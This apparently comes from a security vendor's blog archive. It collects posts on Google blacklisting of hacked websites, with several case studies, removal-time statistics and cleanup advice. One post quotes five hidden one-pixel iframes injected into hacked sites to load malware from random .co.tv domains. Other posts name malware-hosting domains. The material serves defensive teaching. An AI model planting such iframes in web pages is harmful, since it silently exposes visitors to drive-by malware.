Understanding Google’s Blacklist – Cleaning Your Hacked Website and Removing From Blacklist

Today we found an interesting case where Google was blacklisting a client’s site but not sharing the reason why. The fact they were sharing very little info should not be new, but what we found as we dove a little deeper should be. The idea is to provide you webmasters with the required insight to understand what is going on, and how to troubleshoot things when your website is blacklisted.

Get Your Bearing

While investigating the website, we found that some Google shortened URLs were being loaded and redirecting to http://bls.pw/. Two of the goo.gl links were pointing to Wikipedia images, their icon to be specific, and one was redirecting to http://bls.pw/ shortener.

goo.gl/9yBTe - http://bits.wikimedia.org/favicon/wikipedia.ico
goo.gl/hNVXP - http://bits.wikimedia.org/favicon/wikipedia.ico?2x2
goo.gl/24vi1 - http://bls.pw/

A quick search for this last URL took us to /wp-content/themes/Site’sTheme/css/iefix.sct. As malware writers like to do, it was trying to trick us into believing it was good code. In this case, the Sizzle CSS Selector Engine code (Real code here) was the target:

Sucuri  Sizzle CSS Selector Engine Modified III

Read More

Understanding Search Engine Warnings – Part I – Google – This Site May Be Hacked

If you have any questions about malware, blacklisting, or security in general, send them to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: I just found out that my site is being flagged on Google’s search engine results page with the message “This site may be hacked”. What does it mean?

Answer: This is a good question and one we see often from our clients. We see it so often that we decided to do a series on each type of blacklist warnings that show up on search engines. These are the warnings that we will cover in this series:

Read More

NBC Website HACKED – Be Careful Surfing

Breaking, the NBC site is currently compromised and blacklisted by Google. Anyone that visits the site (which includes any sub page) will have malicious iframes loaded as well redirecting the user to exploit kits (Redkit):

*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Lenos garage and others.

Screen Shot 2013-02-21 at 11.15.51 AM

If you are visiting it from Chrome or Firefox would get the following warning:

Screen Shot 2013-02-21 at 11.18.14 AM

Read More

New Google Chrome Blacklist Warning for Macs

If you go to a site that is Blacklisted by Google, you will see a new (and prettier) malware warning now if you are using a Mac:

The Website Ahead Contains Malware!
Google Chrome Has Blocked access to site.com for now.
Even if you have visited this site safely in the past, visiting it now may infect your Mac with malware.

Nothing major has changed, but we found this new wording to be more clear for the end user. So good move from the Google/Chrome team.

Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin

If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.

The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2″, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.

Read More

Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

If you have any questions about malware, blacklisting, or security in general, send it over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 (13 hours)
  • Minimum time: 290 (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files, fix them. If you remove them, they will 404, and a 404 will delay the verification (even if you need to leave the file with a 0-size, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.


Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!

Google blocks .co.cc, attackers are now using .co.tv

It is being reported that Google took action against the high number of malware sites in the .co.cc domain, removing more than 11 million sites from their search results.

For us this is good news, since we haven’t been seeing anything good coming from there (only malware and spam). They did a similar thing a few weeks ago blacklisting the whole .cz.cc domain.

However, just as they blacklisted the .co.cc, we are starting to see the attackers switching tactics and using different free domains. The popular one now is .co.tv:

<iframe src="http://uhcmsgfq.co.tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://yswlifofj.co.tv/?go=1" width="1" height="1"></iframe> 

<iframe width="1" height="1" src="http://vmvfonc.co.tv/?go=1"></iframe>

<iframe src="http://cvfplmpsap.co.tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://kwhnqxvslf.co.tv/?go=1" width="1" height="1"></iframe>

Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have been on the .co.cc domain). As you can see by their names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc) they are random and being mass generated.

We are also seeing a lot of malware and spam in the .co.be domain range (like dumoxoveba21.co.be), but it seems Google banned the whole .co.be range as well.

What Google is doing is good, but the “war” is not over :)


If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.

What to do when your site gets blacklisted

Most site owners only start to think about security when their site gets hacked (infected with malware) and blacklisted by Google.

So, here is what you need to do once you find out that your site is blacklisted:

*If you are registered with us already, don’t worry about it, just open a support request (we will take care of it).

Read More

ASIS International Website Blacklisted by Google

The official website (asisonline.org) of ASIS International, a major physical security association was hacked and blacklisted yesterday. Add another case to the list of sites using outdated and/or vulnerable applications. In the case of ASIS, they were running a vulnerable version of OpenX (ad server software) and the attackers injected malicious code in there.

Anyone visiting the ASIS website has ads served from ads.asisonline.org which is the culprit. The ad server is loading malware from: hxxp://liyerfit.com/blogs/martin/. The malware string can be detected using our scanner.



Read More

UFC.com blacklisted by Google (indirectly)

Anyone trying to visit the site UFC.com (from Google Chrome or Firefox) will get a big scary warning from Google:

UFC.com blacklisted

Warning: Visiting this site may harm your computer!
The website at www.ufc.com contains elements from the site bin.clearspring.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

They are getting indirectly blacklisted because they are loading content from bin.clearspring.com (an advertising network), which is currently blacklisted by Google for having malware.

As far as clearspring is concerned, it seems they’ve been hacked and the attacker has added malicious code to load malware from semaniseme.com and wenmo.in. So multiple levels of indirection here to affect UFC.com users.

Anyone else using clearspring should remove their code from their sites until they have this blacklist issue sorted out.

To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.